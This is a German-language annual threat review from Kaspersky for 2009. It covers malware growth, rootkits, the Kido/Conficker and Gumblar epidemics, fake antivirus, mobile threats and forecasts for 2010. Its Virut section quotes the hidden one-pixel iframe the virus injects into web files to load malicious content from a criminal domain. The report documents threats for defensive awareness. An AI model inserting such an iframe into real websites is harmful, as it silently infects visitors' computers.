Kaspersky Security Bulletin 2009: Entwicklung der IT-Bedrohungen

  1. Kaspersky Security Bulletin 2009: Entwicklung der IT-Bedrohungen
  2. Kaspersky Security Bulletin 2009: Malware-Statistik
  3. Kaspersky Security Bulletin 2009: Spam

Trends des Jahres

Das Jahr 2009 wurde zu einem weiteren Meilenstein sowohl in der Geschichte der Schadprogramme als auch in der Geschichte der Cyberkriminalität, denn wieder einmal hat die Entwicklung in beiden Bereichen eine völlig neue Richtung eingeschlagen. In diesem Jahr wurde der Grundstein für das gelegt, was wir in den nächsten Jahren zu erwarten haben.

In den Jahren 2007 und 2008 starb Schadsoftware, die keinem kommerziellen Zweck diente, praktisch aus. Informationen stehlende Trojaner wurden zu der wichtigsten Schädlings-Gattung. Im Visier der Kriminellen standen dabei in erster Linie Spieler von Online-Games, insbesondere ihre Passwörter, ihre Spielcharaktere sowie virtuelle Wertsachen.

Im Laufe der letzten drei bis vier Jahre mauserte sich China zum Hauptlieferanten schädlicher Software. Der chinesische Cyberuntergrund konnte derartige Unmengen an Schadprogrammen produzieren, dass in den letzten zwei Jahren ausnahmslos alle Antiviren-Hersteller einen Großteil ihrer Energien auf die Abwehr dieses Stroms verwenden mussten.

Die Statistiken der einzelnen AV-Unternehmen weichen zwar voneinander ab, weil die einen Dateien zählen, die anderen Signaturen und wiederum andere die Angriffe. Doch sie alle spiegeln den deutlichen Zuwachs an neuen Schadprogrammen in der jüngsten Vergangenheit wider. Während Kaspersky Lab innerhalb von 15 Jahren (von 1992 bis 2007) rund 2 Millionen eigenständiger Schadprogramme entdeckte, waren es 2008 und damit nur innerhalb eines Jahres insgesamt 15 Millionen!

Im Jahr 2009 stieg die Zahl der Schadprogramme in den Datenbanken von Kaspersky Lab auf 33,9 Millionen.


Anzahl der in den Datenbanken von Kaspersky Lab enthaltenen Schadprogramme

Im Laufe der Jahre 2007 bis 2009 stieg die Anzahl neuer Bedrohungen kontinuierlich an. Die Reaktion darauf konnte nur in der Entwicklung noch leistungsfähigerer Antiviren-Labore bestehen (und der damit verbundenen Entwicklung von In-the-Cloud-AV-Technologien), in der Entwicklung neuer automatischer Erkennungsmethoden, der Umsetzung neuer heuristischer Analyse-Praktiken, der Entwicklung von Virtualisierungstechnologien und der Verhaltensanalyse.

Auf die Zunahme der Bedrohungen reagierte die AV-Industrie mit der Entwicklung neuer Technologien, um den Schutz der Anwender-Computer zu optimieren. Es ist nicht übertrieben, von einer technischen Revolu­tion zu sprechen. Boten die Standard-AV-Lösungen der 90er Jahre (Scanner und Überwachungstools) noch im Jahr 2006 völlig ausreichenden Schutz, so waren sie 2009 bereits vollkommen überholt und praktisch komplett von Internet-Security-Produkten verdrängt, die viele mehrschichtige Schutztechnologien miteinander kombinieren.

Während die Anzahl neuer Bedrohungen in den Jahren 2007 bis 2008 in arithmetischer Progression anstieg, wurden 2009 in etwa gleich viele neue Schadprogramme entdeckt wie im Jahr 2008, nämlich um die 15 Millionen.


Anzahl neuer, im Laufe eines Jahres von Kaspersky Lab entdeckter Schadprogramme (2003 bis 2009)

Für diese Stabilisierung gibt es mehrere Gründe: Der Boom des Jahres 2008 ist nicht allein auf die rege Viren-Entwicklung in China zurückzuführen, sondern auch auf die Weiterentwicklung der Technologien zur Infizierung von Dateien (was zu einem Anstieg einzigartiger Schaddateien führte) sowie auf die neue Ausrichtung im Bereich der Browser-Angriffe.

Diese Tendenzen haben sich im Jahr 2009 zweifellos fortgesetzt, allerdings ohne weitere bahnbrechende Entwicklung. Zudem gab es weniger Aktivität von verschiedenen trojanischen Programmen, insbesondere Game-Trojanern. Diesbezüglich hat sich die Prognose bestätigt, die Kaspersky Lab bereits Ende 2008 abgegeben aht. Dass diese Vorhersage eintreffen würde, zeichnete sich schon Mitte 2009 ab. Der starke Konkurrenzdruck auf dem Markt, die geringeren Einnahmen der Kriminellen sowie die aktive Gegenwehr der Antiviren-Unternehmen – all diese Faktoren führten dazu, dass die Zahl der Game-Trojaner abnahm, was Mitte 2009 auch von anderen AV-Anbietern berichtet wurde.

Die mengenmäßige Abnahme von Game-Trojanern ist auch dem gestiegenen Sicherheitsbewusstsein der Online-Game-Hersteller zuzuschreiben, aufgrund dessen viele Spieler von Online-Games begonnen haben, entsprechende Maßnahmen gegen derartige Bedrohungen zu ergreifen.

Auch der erfolgreiche Kampf von Justiz und Sicherheitsbehörden, Telekommunikationsanbietern und der Antiviren-Industrie gegen illegale Internet-Hosting-Services hat zum Rückgang von Schadprogrammen geführt. Der Grundstein hierfür wurde bereits Ende 2008 gelegt, als Anbieter wie zum Beispiel McColo, Atrivo und EstDomains vom Netz genommen wurden. Im Jahr 2009 setzte sich dieser Kampf fort und führte dazu, dass auch UkrTeleGroup, RealHost und 3FN ihre Aktivitäten einstellen mussten.

Die genannten Services hatten es zu trauriger Berühmtheit gebracht, denn sie stellten Cyberkriminellen und Spammern jeglicher Couleur verschiedene Dienstleistungen zur Verfügung, darunter Steuerungszentren für Botnetze, Phishing-Ressourcen, Websites mit Exploits und vieles mehr.

Die Schließung „grauer“ Hosting-Plattformen führte leider nicht dazu, dass die Betrüger ihre Aktivität komplett einstellten, denn schon bald fanden sie einen neuen Schlupfwinkel. Das Internet war jedoch ein relativ sicherer Ort, solange die Cyberkriminellen noch vollauf mit ihrem „Umzug“ beschäftigt waren.

Bisher deutet alles darauf hin, dass sich diese Tendenz fortsetzt und die Zahl neuer Schadprogramme im Jahr 2010 in etwa der Anzahl der 2009 entwickelten Schädlinge entsprechen wird.

Die Themen des Jahres 2009

Zu den wichtigsten Themen des Jahres 2009 zählen: komplexe Schadprogramme mit Rootkit-Funktionalität, globale Epidemien, der Wurm Kido, Web-Attacken und Botnetze, SMS-Betrügereien sowie Angriffe auf soziale Netzwerke.

Zunehmende Komplexität

Im Jahr 2009 wurden die Schadprogramme wesentlich komplizierter und komplexer. Gab es beispielsweise bisher nur einige Dutzend Schadprogramm-Familien, die über Rootkit-Funktionalität verfügen, so waren derartige Programme im Jahr 2009 nicht nur überaus weit verbreitet, sondern sie hatten sich auch technisch entscheidend verbessert. Besonders erwähnenswert sind in diesem Zusammenhang die Schädlinge Sinowal (Bootkit), TDSS und Clampi.

Bereits seit zwei Jahren verfolgen die Experten von Kaspersky Lab die Entwicklung von Sinowal, und im Frühjahr 2009 beobachteten sie eine neue Verbreitungswelle des Bootkits. Gut im System verborgen und daher von den meisten Antiviren-Programmen unentdeckt war Sinowal das am weitesten entwickelte Schadprogramm überhaupt. Zudem hat sich der Schädling aktiv gegen die Versuche der Antiviren-Unternehmen gewehrt, die Botnetz-Steuerungszentren zu zerschlagen.

Das Bootkit verbreitete sich hauptsächlich über gehackte Websites, Porno-Ressourcen und Seiten, die Piraten-Software zum Download bereitstellen. Praktisch alle Server, über welche die Computer der Anwender infiziert wurden, waren Teil so genannter „Partnerprogramme“ – einer Art von Zusammenarbeit zwischen Inhabern von Websites und Schadprogramm-Autoren. Solche „Partnerschaften“ sind im russischen und ukrainischen Cyber-Untergrund überaus populär.

Der Schädling TDSS verkörpert die Umsetzung gleich zweier überaus komplexer Technologien: Er infiziert die Windows-Systemdateien und erstellt ein eigenes virtuelles Dateisystem, in dem sich sein Haupt-Schadcode verbirgt. TDSS ist als erstes Schadprogramm überhaupt in der Lage, auf dieser Ebene in das System einzudringen. Davor waren keine schädlichen Programme dieser Art bekannt.

Clampi geriet im Sommer 2009 in den Fokus der Experten, nachdem in einigen amerikanischen Großkonzernen und Behörden eine Infizierung mit diesem Schadprogramm festgestellt wurde. Dieser Schädling trat 2008 erstmals in Erscheinung, ist anscheinend russischen Ursprungs und stiehlt die Zugangsdaten zu einer Reihe von Online-Banking-Systemen. Die Clampi-Version des Jahres 2009 unterscheidet sich von seinen Vorgängern nicht nur durch eine komplizierte, mehrere Module umfassende Struktur, deren Aufbau der von Zbot ähnelt, einem anderen berüchtigten Trojaner. Neu ist außerdem das raffinierte Kommunikationsschema des dazugehörigen Botnetzes, das den Datenverkehr mit einem RSA-Algorithmus verschlüsselt.

Eine andere bemerkenswerte Eigenschaft von Clampi: Der Schädling verwendet die Windows-Standard-Tools eines infizierten Rechners, um sich innerhalb lokaler Netzwerke zu verbreiten. Das führte zu verschiedenen Problemen für einige Antiviren-Programme, die nicht in der Lage sind, „vertrauenswürdige Anwendungen“ zu blockieren, und daher in diesem Fall auch die Infizierung nicht verhindern konnten.

Leider sind diese Bedrohungen auch überaus stark im Internet verbreitet. Sowohl Sinowal als auch Clampi brachten es zu weltumspannenden Epidemien, und TDSS war die Ursache einer der umfassendsten Epidemien des Jahres 2009. Besonders weit verbreitet war die Variante Packed.Win32.Tdss.z, die im September in Erscheinung trat und von seinem Autor den Namen TDL 3 erhielt.

Epidemien

Für 2009 sagte Kaspersky Lab eine Zunahme der globalen Epidemien im Vergleich zum Vorjahr voraus, und leider hat sich diese Prognose voll und ganz bestätigt. Nicht nur die bereits beschriebenen Bedrohungen riefen globale Epidemien hervor, sondern auch eine ganze Reihe anderer gefährlicher Schadprogramme.

Angriffe auf die Computer der User

Die im Kaspersky Security Network gesammelten Daten zeigen, dass die folgenden Schadprogramme im Jahr 2009 jeweils mehr als eine Million Systeme angegriffen haben:

  • Kido – Wurm
  • Sality – Virus-Wurm
  • Brontok – Wurm
  • Mabezat – Wurm
  • Parite.b – Dateivirus
  • Virut.ce – Bot-Virus
  • Sohanad – Wurm
  • TDSS.z – Rootkit-Backdoor

Ganz ohne Zweifel ging die umfassendste Epidemie des vergangenen Jahres auf das Konto von Kido (Conficker), der Millionen von Computern rund um den Erdball infizierte. Der Wurm setzte verschiedene Techniken ein, um in Rechner einzudringen: Er fing Passwörter für Netzressourcen ab, verbreitete sich über Flash-Speicher und nutzte die Sicherheitslücke Windows MS08-067 aus. Jeder infizierte Computer wurde als Zombie-Rechner in ein Botnetz eingereiht. Der Kampf gegen das auf diese Weise aufgebaute Zombie-Netzwerk wurde dadurch erschwert, dass in Kido die modernsten und effektivsten Technologien der Viren­schreiberzunft umgesetzt wurden. So empfing eine der Wurm-Modifikationen beispielsweise per Update eine Liste von fünfhundert Domains, deren Adressen nach dem Zufallsprinzip aus einem täglich erstellten Verzeichnis von 50.000 Adressen ausgewählt wurden. Als zusätzlicher Update-Kanal diente zudem eine P2P-Verbindung. Kido versucht überdies die Aktualisierung von Schutzprogrammen zu verhindern, deaktiviert den Windows-Sicherheitsdienst, blockiert den Zugriff auf Websites von Antiviren-Herstellern und vieles mehr.

Bis März 2009 waren die Entwickler von Kido nicht sonderlich aktiv. Nach Einschätzungen der Kaspersky-­Experten gelang es dem Schädling bis dahin, weltweit an die fünf Millionen Computer zu infizieren. Kido verfügte nicht über die Möglichkeit, Spam zu versenden oder DDoS-Attacken zu organisieren. Fachleute erwarteten das Auftreten dieser Funktionen zum ersten April 2009, da die im März verbreitete Version von Kido genau an diesem Datum den Versuch unternehmen sollte, zusätzliche Module zu laden. Die Kido-Autoren zogen es allerdings vor, noch einige Tage damit zu warten, und erst in der Nacht vom 8. auf den 9. April empfingen die befallenen Computer den Update-Befehl per P2P-Verbindung. Dabei wurde nicht nur Kido selbst aktualisiert, sondern auf die infizierten Rechner wurden zwei weitere Programme geladen. Bei dem ersten handelte es sich um einen E-Mail-Wurm aus der Familie Email-Worm.Win32.Iksmas, der für den Versand von Spam verantwortlich ist. Das zweite Programm war ein gefälschtes Antiviren-Programm der Familie FraudTool.Win32.SpywareProtect2009, das Geld für die Beseitigung angeblich gefundener Schadprogramme fordert.

Um eine derart weit verbreitete Bedrohung effektiv zu bekämpfen, wurde eigens die Einsatzgruppe „Conficker Working Group“ ins Leben gerufen – eine Task-Force unter Mitwirkung verschiedener Antiviren-Unternehmen, Internet-Provider, unabhängiger Forschungsorganisationen, Bildungseinrichtungen und Regulierungsbehörden. Es handelt sich dabei um eine bis dahin nie dagewesene, breit angelegte internationale Zusammenarbeit, die über die üblichen Kontakte der Antiviren-Experten untereinander weit hinausgeht. Die „Conficker Working Group“ kann damit als gute Basis für eine ständige Organisation dienen, die sich dem Kampf gegen Bedrohungen verschreibt, die die gesamte Welt terrorisieren.

Die Kido-Epidemie setzte sich das gesamte Jahr 2009 fort. Im November überschritt die Zahl der infizierten Computer die 7-Millionen-Marke.

Entwicklung der Kido-Epidemie, Quelle: www.shadowserver.org

Ausgehend von der Erfahrung mit älteren Würmern wie Lovesan, Sasser und Slammer, die nach demselben Prinzip funktionierten, ist davon auszugehen, dass sich die globale Kido-Epidemie auch im Jahr 2010 fortsetzen wird.

Keineswegs außer Acht lassen kann man die durch den Virus Virut hervorgerufene Epidemie. Das Besondere an Virus.Win32.Virut.ce ist dessen Angriffsziel, nämlich Webserver. Auch der Infizierungsmechanismus dieses Schädlings ist durchaus erwähnenswert: Der Virus infiziert nicht nur ausführbare Dateien der Erweiterungen .EXE und .SCR, sondern fügt den HTML-, PHP- und ASP-Webdateien des infizierten Servers einen speziellen Code in Form eines Links hinzu, der zum Beispiel so aussieht:

<iframe src=“http://ntkr(xxx).info/cr/?i=1″ width=1 height=1> </ iframe>

Beim Besuch einer infizierten legalen Webseite werden ohne Wissen des Anwenders über den vom Virus hinzugefügten Link beliebige, von den Cyberkriminellen vorbereitete schädliche Inhalte auf den Computer geladen. Daneben verbreitet sich dieser Virus in P2P-Netzwerken über infizierte Key-Generatoren, die Seriennummern für populäre Programme erstellen. Das Ziel einer Infizierung ist der Zusammenschluss aller befallenen Rechner zu einem IRC-Botnetz, das zum Versand von Spam verwendet wird.

Infizierungen von Web-Ressourcen

Eine der umfassendsten Epidemien im Internet betraf zehntausende von Webseiten und wurde von verschiedenen Angriffswellen des Schädlings Gumblar ausgelöst. Die erste Version des Schädlings infizierte legale Websites mit einem Skript. Das eingeschleuste Skript leitete die Anfragen von Besuchern unbemerkt auf die Website der Kriminellen um, über die dann schädliche Software verbreitet wurde.

Gumblar wurde nach der schädlichen Website benannt, auf die Besucher gehackter Webseiten im Verlauf der ersten Angriffswelle umgeleitet wurden, und die deren Rechner anschließend mit Malware infizierte. Diese Attacken waren ein Paradebeispiel für die Technologien der Generation Malware 2.5, über die wir zu Beginn des vergangenen Jahres bereits berichteten.

Im Herbst 2009 wurden auf den gehackten Webseiten Links plaziert, die nicht mehr auf die Sites der Kriminellen führten, sondern auf andere legale, infizierte Webseiten, was die Bekämpfung der Gumblar-Epidemie weiter erschwerte.

Warum breitet sich Gumblar dermaßen schnell aus? Die Antwort ist einfach: Es handelt sich um ein voll automatisiertes System. Wir haben es mit einer neuer Generation sich selbst aufbauender Botnetze zu tun. Das System greift die Besucher von Websites offensiv an und stiehlt nach der Infizierung ihrer Computer Zugangsdaten für FTP-Server mit Hilfe einer ausführbaren Windows-Datei. Die FTP-Server-Accounts werden anschließend zur Infizierung aller Seiten auf neuen Webservern benutzt. Auf diese Weise treibt das System die Zahl der befallenen Seiten in die Höhe. Dieser Prozess ist komplett automatisiert, und die Betreiber des schädlichen Netzwerks müssen lediglich die Arbeit des Systems regulieren, die Exploits für die Angriffe auf Browser auswählen und die ausführbare trojanische Datei aktualisieren, welche die Zugangsdaten stiehlt. Das System funktioniert als geschlossener Kreislauf: Aus dem Angriff auf neue Computer stammen die Kontodaten für neue FTP-Server, mit deren Hilfe wiederum neue Server infiziert werden.

Betrug

Immer vielfältiger werden auch die im Internet kursierenden Betrugsmaschen. Zu dem bereits traditionellen und überaus verbreiteten Phishing gesellten sich verschiedene „graue“ Websites, die kostenpflichtigen Zugriff auf nicht existierende Services anbieten. Absoluter Spitzenreiter ist in dieser Hinsicht leider Russland. Ausgerechnet russische Betrüger produzierten wie am Fließband Sites mit dem Angebot, „den Aufenthaltsort von Personen mittels GSM herauszufinden“, „private Korrespondenz in sozialen Netzwerken zu lesen“, „Informationen zu sammeln“ und so weiter und so fort. Die komplette Auflistung aller Angebote würde mehrere Seiten füllen. Um einen derartigen Dienst in Anspruch nehmen zu können, wird der Anwender in allen Fällen aufgefordert, eine SMS an eine Premium-Nummer zu senden, wobei nicht darauf hingewiesen wird, dass der Preis für eine solche SMS bis zu 10 US-Dollar betragen kann. Alternativ muss sich der Anwender wiederum mit Hilfe einer SMS auf irgendeine Weise „registrieren“, woraufhin täglich Geld von seinem Mobiltelefon-Konto abgebucht wird.

Auf dem Höhepunkt ihrer Aktivität gab es mehrere Hundert derartiger Services, deren Betrieb Dutzende von „Partner-Programmen“ beschäftigte. Um vertrauensselige User anzulocken, wurde sowohl traditioneller E-Mail-Spam als auch Spam in sozialen Netzwerken und IM-Spam eingesetzt. Zur Umsetzung des Spam-Versands führten die Kriminellen Virus- und Phishing-Attacken durch und konnten sich so Zugriff auf die ­Accounts der User verschaffen. Sie erstellten außerdem Dutzende von gefälschten Social-Network-Sites – um nur einige ihrer Tricks zu nennen. Erst gegen Ende 2009 trafen diese Praktiken auf ernst zu nehmende Gegenwehr von Mobilfunkanbietern, Administrationen sozialer Netzwerke und Antiviren-Herstellern.

Im Zusammenhang mit Kido hat Kaspersky Lab bereits über den Download eines weiteren Schadprogramms berichtet, und zwar eines gefälschten Antiviren-Programms. Malware dieser Art informiert den User über die Entdeckung von Schadprogrammen auf dem Computer und bietet gegen Geld an, die angeblich aufgetretenen Fehler zu beseitigen und das System zu desinfizieren. In Wirklichkeit finden und desinfizieren die falschen Anti­viren-Tools aber rein gar nichts. Derartige Programme sind überaus verbreitet, und Kaspersky Lab hat schon mehrfach darüber berichtet.

2009 wurden die Pseudo-AV-Programme unter Cyber­kriminellen immer beliebter. Für deren Verbreitung werden nicht nur andere Schadprogramme eingesetzt, sondern auch Werbung im Internet geschaltet. Derzeit platzieren die meisten einschlägigen Sites Banner mit Informationen über ein neues „Wunderprodukt“, das den Anwender von allen Viren-Problemen erlöst. Selbst auf legalen Websites ist die Wahrscheinlichkeit recht hoch, blinkende Banner oder aufdringliche Flash-Werbung für ein „neues Antiviren-Programm“ zu entdecken. Außerdem kann es passieren, dass sich während des Surfens ein Fenster im Browser mit dem Angebot öffnet, ein Antiviren-Programm kostenlos herunterzuladen. Je glaubwürdiger die gefälschten Sicherheits­lösungen echte, legale Software imitieren, desto größer sind die Chancen der Betrüger, Geld für die „Arbeit“ ihrer Fake-Produkte zu kassieren.

Die Popularität gefälschter Antiviren-Programme bei Cyberkriminellen und die weite Verbreitung sind in erster Linie dadurch zu erklären, dass diese Tools leicht zu entwickeln sind, sich effektiv verbreiten lassen und den Übeltätern innerhalb kurzer Zeit hohe Gewinne einbringen. Nach im November 2009 veröffentlichten Schätzungen der amerikanischen Ermittlungsbehörde FBI verdienten die Online-Kriminellen rund 150 Millionen US-Dollar mit gefälschter AV-Software (www.scmagazineus.com).

Aktuell befinden sich über 300 verschiedene Familien gefälschter Antiviren-Programme in den Datenbanken von Kaspersky Lab.

Schadprogramme für alternative Betriebssysteme

Auch im Jahr 2009 setzten sich die Cyberkriminellen intensiv mit alternativen Plattformen wie zum Beispiel mobilen Betriebssystemen und Mac OS auseinander. Die Firma Apple, die stets versichert hatte, Schadprogramme für Mac OS würden keine Gefahr darstellen, beschäftigte sich nun mit den Viren-Bedrohungen für den Mac und integrierte sogar eine Art Virenscanner in die neue Betriebssystem-Version. Bei den mobilen Plattformen ist die Lage nach wie vor unklar. Auf der einen Seite traten schon lange erwartete Ereignisse ein: Für das iPhone tauchten die ersten Schadprogramme auf (Wurm Ike), für Android wurde die erste Spyware entwickelt, und für Symbian-Smartphones wurden die ersten Fälle mit abonnierten Schadprogrammen registriert. Auf der anderen Seite kämpfen die Betriebs­sys­teme selbst um Marktanteile, wodurch sie den Viren­schreibern die Entscheidung schwer machen, auf welches OS sie ihre Anstrengungen konzentrieren sollen.

Im Jahr 2009 entdeckte Kaspersky Lab 39 neue Familien und 257 neue Modifikationen von Schadprogrammen für mobile Geräte. Zum Vergleich: Im Jahr 2008 wurden 30 neue Familien und 143 neue Modifikationen entdeckt. Nach Monaten gestaffelt stellt sich das Erscheinen neuer Bedrohungen wie folgt dar:


Auftreten neuer Modifikationen, jeweils 2008 und 2009

Die wichtigsten Ereignisse im Bereich mobiler Schadprogramme sind in der Kaspersky-Analyse „Virenschutz für mobile Endgeräte, Teil 3“ (www.kaspersky.com/de) beschrieben. Zu den bemerkenswertesten Vorkommnissen und Tendenzen des Jahres 2009 auf diesem Gebiet gehören:

  • Ausbildung eines kommerziellen Marktes für mobile Schadprogramme
  • Erscheinen von „abonnierten“ Schädlingen für Symbian S60 3rd Edition
  • Verschiedene Spielarten von SMS-Betrügereien
  • Erscheinen von Schadprogrammen mit deutlich finan­ziellem Hintergrund, die in der Lage sind, mit den Servern der Cyberkriminellen zu kommunizieren

Das Erscheinen von Schadprogrammen, die in der Lage sind, mit den Servern der Cyberkriminellen zu kommunizieren, ist die wohl wichtigste Entwicklung der zweiten Jahreshälfte 2009. Zu ihrer Verbreitung haben besonders die Zunahme von drahtlosen Netzwerken und die geringen Gebühren für mobiles Internet beigetragen. Beide Faktoren ermöglichen es den Usern von Smartphones und Mobiltelefonen, immer häufiger ins Netz zu gehen.

Die Kommunikation zwischen mobilen Schadprogrammen und entfernten Servern eröffnet Online-Kriminellen völlig neue Möglichkeiten:

>

  • SMS-Trojaner können Parameter für die zu versendenden Kurznachrichten von einem Remote-Server entgegennehmen. Wird das Präfix blockiert, ist der Betrüger nicht gezwungen, das Schadprogramm zu aktualisieren. Er muss lediglich ein neues Präfix wählen und dieses auf dem Server platzieren.
  • Auf mobilen Geräten installierte Schadprogramme können Updates von Remote-Servern empfangen.
  • Die Herstellung einer Verbindung zwischen mobilen Schadprogrammen und einem Remote-Server kann der erste Schritt zu einem Botnetz sein, in das alle mit diesen Schädlingen infizierten mobilen Geräte eingegliedert werden.

    Kaspersky Lab geht davon aus, dass sich diese Tendenz im Jahr 2010 fortsetzen wird und uns eine große Zahl von Schädlingen erwartet, die ihr schädliches Potential per Internet-Verbindung entfalten.

    Zu den bedeutenden Ereignissen des Jahres 2009 zählt auch die Entdeckung des trojanischen Programms Backdoor.Win32.Skimer. Zwar trat dieses Ereignis bereits Ende 2008 ein, doch erst im Frühjahr 2009 wurde es allgemein bekannt. Es handelt sich hierbei um das erste Schadprogramm für Bankautomaten. Nach der erfolgreichen Infizierung kann der Betrüger mit Hilfe einer speziellen Karte verschiedene illegale Aktionen durchführen. Er kann zum Beispiel das gesamte im Automaten befindliche Geld abheben oder Daten über die Kreditkarten der Personen sammeln, die Transak­tionen über den infizierten Automaten durchgeführt haben. Der Trojaner wurde ganz offensichtlich von einer Person geschrieben, die mit der Soft- und Hardware von Bankautomaten bestens vertraut ist. Die Analyse des Trojaner-Codes legt den Schluss nahe, dass sich das Schadprogramm speziell gegen in Russland und der Ukraine installierte Bankautomaten richtet, denn es verfolgt Transaktionen in US-Dollar, russischen Rubeln und ukrainischen Grivna.

    Der Code kann auf zwei Arten in den Bankautomaten gelangen, entweder durch direkten physischen Zugriff auf das System oder über das interne Banknetzwerk, an das der Bankautomat angeschlossen ist. Eine herkömmliche Antiviren-Software reicht voll und ganz aus, um dieser Backdoor den Garaus zu machen. Kaspersky Lab hat deshalb allen Banken dringend empfohlen, alle mit Bankautomaten in Verbindung stehenden Netzwerke einem Antiviren-Scan zu unterziehen.

    Prognosen

    Nach Meinung der Experten von Kaspersky Lab werden wir es im Jahr 2010 mit den folgenden Ereignissen und Problemen zu tun bekommen:

    1. Verschiebung der Angriffsziele – von Attacken über das Web zu Angriffen über Filesharing-Netzwerke. Diese Veränderung ist eine direkte Folge der Entwicklung der Schutztechnologien und somit das unausweichlich nächste Glied in der chronologischen Kette: In den Jahren 2000 bis 2005 wurden die User über E-Mail angegriffen, zwischen 2005 und 2006 erfolgten die Angriffe über das Netz, und von 2006 bis 2009 attackierten die Cyberkriminellen die Anwender über Websites inklusive sozialer Netzwerke. Bereits im Jahr 2009 wurde eine ganze Reihe von umfassenden Virenepidemien über Torrent-Dateien verbreitet. Auf diese Weise verbreiteten sich nicht nur so starke Bedrohungen wie TDSS und Virut, sondern auch die ersten Backdoors für Mac OS. Für 2010 erwarten wir eine deutliche Zunahme derartiger Fälle in P2P-Netzen.
    2. Kampf um Traffic. Die Cyberkriminellen sind zunehmend bemüht, ihre Geschäfte zu legalisieren. Das Internet bietet vielfältige Möglichkeiten Geld zu verdienen, wenn man große Mengen an speziellem Traffic zu bieten hat, der wiederum mit Hilfe von Botnetzen generiert werden kann. Streiten sich bisher im Wesentlichen nur Services um den Botnet-Traffic, die alle gleichermaßen kriminell sind, so ist in der Zukunft auf dem Markt der Botnetz-Dienstleistungen das Erscheinen halblegaler, „grauer“ Strukturen zu erwarten. So genannte „Partner-Programme“ bieten den Betreibern von Botnetzen die Möglichkeit, ohne offensichtlich kriminelle Dienstleistungen wie der Versendung von Spam, DoS-Attacken oder der Verbreitung von Viren Geld zu verdienen.
    3. Epidemien. Der Hauptgrund für das Entstehen von Epidemien liegt nach wie vor in der Entdeckung von Sicherheitslücken – und zwar nicht nur in der Software von Drittanbietern (Adobe, Apple), sondern auch in dem vor kurzem veröffentlichten neuen Microsoft-­Betriebssystem Windows 7. Es sei angemerkt, dass die Drittanbieter die Suche nach Fehlern in ihrer Software in letzter Zeit vorangetrieben haben. Werden im laufenden Jahr keine eklatanten Sicherheitslücken entdeckt, so könnte 2010 zu einem der ruhigsten Jahre in der jüngsten Vergangenheit werden.
    4. Die Schadprogramme werden technisch immer anspruchsvoller und komplizierter. Schon heute gibt es Bedrohungen, die moderne Datei-Infizierungstechnologien und Rootkit-Funktionen einsetzen. Viele Antiviren-Programme sind nicht in der Lage, Systeme zu desinfizieren, die von Schädlingen dieser Art befallen sind. Zukünftig wird sich die Lage weiter verschlechtern. Einerseits werden sich die Sicherheitstechnologien dahingehend weiterentwickeln, dass den Bedrohungen das Eindringen ins System weitestgehend erschwert wird. Andererseits werden die Bedrohungen auch praktisch unverwundbar sein, wenn es ihnen gelingt, derart hoch entwickelte Sicherheitssysteme zu umgehen.
    5. Ähnlich wie den „Game-Trojanern“ wird es auch den gefälschten AV-Programmen ergehen – ihre Zahl wird abnehmen. Erstmals traten Programme dieser Art 2007 in Erscheinung. Im Jahr 2009 hatten sie mengenmäßig den Höchststand erreicht und waren an vielen weit reichenden Epidemien beteiligt. Derzeit ist der Markt an gefälschten Antiviren-Programmen übersättigt, und dementsprechend unbedeutend sind die Einnahmen der Betrüger auf diesem Gebiet. Auch die gesteigerte Aufmerksamkeit, die die Antiviren-Industrie sowie Justiz und Sicherheitsbehörden derartigen Programme widmen, macht ihnen das Leben schwer.
    6. Im Bereich Web-Services werden Google Wave und Angriffe über diesen Service das Thema des Jahres. Zweifellos werden auch diese Attacken dem bereits etablierten Schema folgen – zuerst Spam, danach Phishing-Attacken, dann Ausnutzung von Sicherheitslücken und die Verbreitung von Schadprogrammen. Von großem Interesse ist auch die Veröffentlichung von Google ChromeOS — doch in diesem Jahr ist noch nicht zu erwarten, dass die Cyberkriminellen dieser Plattform allzu viel Aufmerksamkeit widmen werden.
    7. Hinsichtlich mobiler Plattformen für das iPhone und Android erwartet Kaspersky Lab für 2010 reichlich Komplikationen. Das Auftreten erster Bedrohungen für diese Plattformen im Jahr 2009 zeugt davon, dass die Cyberkriminellen ein zunehmendes Interesse daran entwickeln. Und während sich die Gefahr für die ­iPhone-User nur auf diejenigen beschränkt, die gehackte Geräte verwenden, so gilt diese Einschränkung für die Plattform Android nicht, denn die Anwendungen hierfür können aus jeder beliebigen Quelle installiert werden. Die wachsende Popularität von Telefonen auf der Basis dieses Betriebssystems in China und die unzulänglichen Kontrolltechnologien für die zu veröffentlichenden Anwendungen werden 2010 eine Reihe spürbarer Viren-Vorfälle nach sich ziehen.
  • Ähnliche Beiträge

    Schreibe einen Kommentar

    Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.